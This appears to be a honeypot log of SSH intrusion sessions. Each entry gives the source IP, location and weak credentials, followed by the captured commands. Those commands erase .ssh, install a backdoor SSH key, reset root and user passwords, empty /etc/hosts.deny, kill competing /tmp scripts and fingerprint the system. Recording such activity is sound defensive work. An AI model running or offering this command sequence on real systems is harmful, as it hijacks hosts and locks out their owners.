$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_80 (116.71.136.125) β€” Islamabad, Pakistan Β· 2 sessions Β· 38 cmds
2026-05-19 07:04 EDT Β· as root/pa$$word, root/r00tr00t
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:dUgfXXHsXMAL"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:LON5AciubxkC"|chpasswd|bash
🎭 shadow_root_78 (43.153.193.67) β€” Singapore, Singapore Β· 2 sessions Β· 38 cmds
2026-05-19 07:08 EDT Β· as root/!Password, root/tsserver
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:V36eI73E9cR0"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:NGOFAZxSBMHo"|chpasswd|bash
🎭 specter_root_90 (43.163.97.57) β€” Singapore, Singapore Β· 2 sessions Β· 38 cmds
2026-05-19 07:07 EDT Β· as root/!Password, root/tsserver
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:TgLzUovmvRp8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:cFeCPd0fIDMx"|chpasswd|bash
🎭 panda_root_32 (106.75.29.99) β€” Yangpu, China Β· 1 session Β· 19 cmds
2026-05-19 06:39 EDT Β· as root/flink
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:PDyQIvKogYMp"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_49 (43.130.48.59) β€” Santa Clara, United States Β· 1 session Β· 20 cmds
2026-05-19 03:09 EDT Β· as ela/ela
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "ela\nNS6eiLNke5rd\nNS6eiLNke5rd"|passwd|bash
$ Enter new UNIX password:
$ echo "ela\nNS6eiLNke5rd\nNS6eiLNke5rd\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cowboy_root_47 (72.167.226.79) β€” Ashburn, United States Β· 2 sessions Β· 39 cmds
2026-05-19 03:01 EDT Β· as claude/Claude2026!, root/mohammad
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "Claude2026!\n3aoyrtmTZLoH\n3aoyrtmTZLoH"|passwd|bash
$ Enter new UNIX password:
$ echo "Claude2026!\n3aoyrtmTZLoH\n3aoyrtmTZLoH\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:jP3w7PLjnnpb"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 rogue_root_100 (43.134.103.74) β€” Singapore, Singapore Β· 1 session Β· 19 cmds
2026-05-19 03:05 EDT Β· as root/team3
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Xr6yTgrrLmtu"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_103 (43.134.228.151) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-19 03:00 EDT Β· as admin/Admin@123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Admin@123\nq3n6mLeG4Ahk\nq3n6mLeG4Ahk"|passwd|bash
$ Enter new UNIX password:
$ echo "Admin@123\nq3n6mLeG4Ahk\nq3n6mLeG4Ahk\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_95 (69.6.227.94) β€” Curauma, Chile Β· 1 session Β· 1 cmd
2026-05-19 02:33 EDT Β· as root/jimster2025
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 monsoon_root_18 (142.93.208.47) β€” Bengaluru, India Β· 1 session Β· 1 cmd
2026-05-19 01:55 EDT Β· as jimster/admin123@Jimster
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 phantom_sol_4 (151.95.83.235) β€” Treviso, Italy Β· 2 sessions Β· 38 cmds
2026-05-19 01:15 EDT Β· as root/jenkins1234, root/tang
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:0YB8huiu2Vvg"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:3NtPNt2Of1oR"|chpasswd|bash
🎭 autobahn_sol (135.125.226.143) β€” Limburg an der Lahn, Germany Β· 1 session Β· 19 cmds
2026-05-19 01:13 EDT Β· as root/tang
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:IsjfPUO3VBKa"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_101 (124.156.196.45) β€” Singapore, Singapore Β· 3 sessions Β· 59 cmds
2026-05-19 00:25 EDT Β· as claude/Claude2026!, root/Ds123456, testuser/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "Claude2026!\nPGpEuQ8NEZe2\nPGpEuQ8NEZe2"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Claude2026!\nPGpEuQ8NEZe2\nPGpEuQ8NEZe2\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:IsIkauJFoIH6"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "123456\nSakfPTmiZaHb\nSakfPTmiZaHb"|passwd|bash
$ echo "123456\nSakfPTmiZaHb\nSakfPTmiZaHb\n"|passwd
🎭 eagle_root_48 (43.153.27.42) β€” Santa Clara, United States Β· 3 sessions Β· 59 cmds
2026-05-19 00:25 EDT Β· as claude/Claude2026!, root/Ds123456, testuser/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "123456\np7vKfXvU5h3r\np7vKfXvU5h3r"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\np7vKfXvU5h3r\np7vKfXvU5h3r\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo -e "Claude2026!\n5NtrUexsLAcF\n5NtrUexsLAcF"|passwd|bash
$ echo "Claude2026!\n5NtrUexsLAcF\n5NtrUexsLAcF\n"|passwd
$ echo "root:yi56dEDBeW5B"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 shadow_root_79 (196.218.222.18) β€” Ash-Shaykh Zāyid, Egypt Β· 3 sessions Β· 59 cmds
2026-05-19 00:21 EDT Β· as claude/Claude2026!, root/Ds123456, testuser/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "Claude2026!\nQiNnien3jEs1\nQiNnien3jEs1"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "Claude2026!\nQiNnien3jEs1\nQiNnien3jEs1\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
